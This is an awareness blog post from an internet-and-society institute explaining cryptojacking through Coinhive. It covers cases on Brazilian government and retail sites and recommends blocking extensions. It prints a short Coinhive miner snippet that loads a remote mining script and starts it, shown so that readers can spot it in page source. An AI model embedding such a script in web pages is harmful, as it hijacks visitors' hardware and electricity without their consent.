Blog

Cryptojacking of processing power: what is it and how to protect yourself?

Written by

11 de December de 2017

Most website admins have always tried to profit through their pages, one way or another, for various reasons: whether to make an actual profit or simply to maintain it online. It has been that way with direct advertisement, adwares, spywares, sponsored posts and premium content. It just so happens that, with innovation and new technologies, such as cryptocurrencies, gaining momentum, admins find another way to profit with users and their access: using their processing power to mine cryptocurrency.

This novel practice has been called “cryptojacking” and has been used as a form of cyberattack and also as an alternative means for admins to profit through their websites. Some notable examples will be explained at the end, but include: government websites, the Piratebay, the UFC website, MBL’s Jornalivre and many others with various ends. That action basically hijacks computing power of an user’s computer or graphics card to mine cryptocurrencies for a third party, in many cases unknown. It has been called “cryptojacking” because it requires a lot of computing and processing power in order to slowly mine a new coin. Cryptocurrency mining is done through the solving of several highly complex mathematical problems, which then reward those who have used their processing power with a proportional amount of a certain cryptocurrency.

Even though it still has not been practiced in a large scale, it raises concerns and demands some attention, as, according to certain tests by users, the increased required processing power takes its toll on the user’s hardware and electricity bill.

How does it happen and when did it begin?

It all started when a company called Coinhive created a code which allows several different computers to be brought together in their processing power in order to mine cryptocurrency. It advertised itself as a new way of profiting with websites by implementing a script which forces users’ computers to mine cryptocurrencies, sharing the results between Coinhive and the website owner. It uses its software to mine Monero, which is easier to mine than Bitcoin.

The company’s website allows one to see its business plan, the used code and the products it offers: hijacking through captcha, shortened URLs or simply by accessing the website. It takes only a few lines of code, such as the following, and which can be easily spotted on a page’s source code:

<script src=“https://coinhive.com/lib/coinhive.min.js”></script>
<script>
var miner = new CoinHive.User(‘<site-key>’, ‘john-doe’);
miner.start();
</script>

When activated, the script kidnaps all the hardware’s processing power, causing the battery to be depleted much faster, the computer to get slower and more energy-consuming.

Example of a script running on an i5, 2.6 ghz computer

Website admins get a dashboard with all the information concerning the mining operation, and are able to follow the mining rate, how much are they profiting and the total hash number.

Admin’s dashboard on a website utilizing Coinhive

This way, Coinhive’s business model is quite complete, complex and worrisome: it offers admins total control over the hijacking of processing power, charges a fee and advertises itself as a way of reducing advertisement on the Internet.

Recent and notable cases

The State of São Paulo government’s Cidadão.sp website

Google’s lawyer, Felipe Hoffa, denounced on his twitter that a website ran by the government of the State of São Paulo was using Coinhive to hijack processing power from its users:

Coinhive script detected in São Paulo government’s Cidadão.sp website


After the complaint, the government declared it hadn’t used the tool and removed the script from its website.

Piratebay.org

The famous torrent tracker website was using a Javascript script by Coinhive. The implementation was made in a intentional and declared manner by the Pirate Bay team, as a test of a new way of creating income.

Process graphic accessing The Pirate Bay website

RiHappy’s Christmas Website

The retail toy store was also denounced on Twitter and there was no manifestation by the company. The script was operating hidden on the www.umacasadenatal.rihappy.com.br website and was removed after complaints by users.

Coinhive script detected in Ri Happy Christmas website

How to protect yourself?

Technologies can bring several conveniences to our lives, but certain barriers which must be fought against by all of society are also brought with it. Here are some ways of protecting yourself against such schemes:

No Coin

No Coin is an open source extension created by Swiss programmer Rafael Keramidas and is available on Chrome, Firefox and Opera’s extension stores. It is easy to use and install and requires no previous registration.

No Coin at Chrome Web Store

Script Blocker

Script Blocker is an extension which blocks the execution of any script while active. It is also available on Chrome and Firefox’s stores.

Script Blocker at Chrome Web Store

Tor

Tor is an anonymous, safe and privacy-ensuring browser which doesn’t allow for scripts to be ran automatically.

Tor browser logo

 

Now you know what cryptojacking is, how it works and how to protect yourself. It is important for everyone to raise awareness on the issue, so it may be brought to discussion before it becomes a norm rather than an exception, causing great disturbance in many users’ life. What are you waiting for? Protect yourself and share it with your friends!

The views and opinions expressed in this article are those of the authors and do not necessarily reflect the official policy or position of the Institute for Research on Internet and Society.

Written by

Law bachelor in the Federal University of Minas Gerais and graduated from the Federal Institute of Minas Gerais (IFMG). Composed the coordinating team of GNET – Group of International Studies of Intellectual Property, Internet and Innovation in the year of 2017.

Davi worked as a researcher at the Institute of Reference in Internet and Society (IRIS) and researcher founder in the research group DTI – Law, Technology and Innovation. Worked as a jr consultant at Alexandre Atheniense office in digital corporate compliance services in hospital networks.

Alumni of the Internet Governance School of the Internet Governance and a fellow at the Youth @IGF (2017) program of the Internet Governance Committee in Brazil (CGI.br) to participate in the 12th Internet Governance Forum in Palace of Nations in Switzerland.

Leave a Reply

Your email address will not be published. Required fields are marked *

Veja também

See all blog posts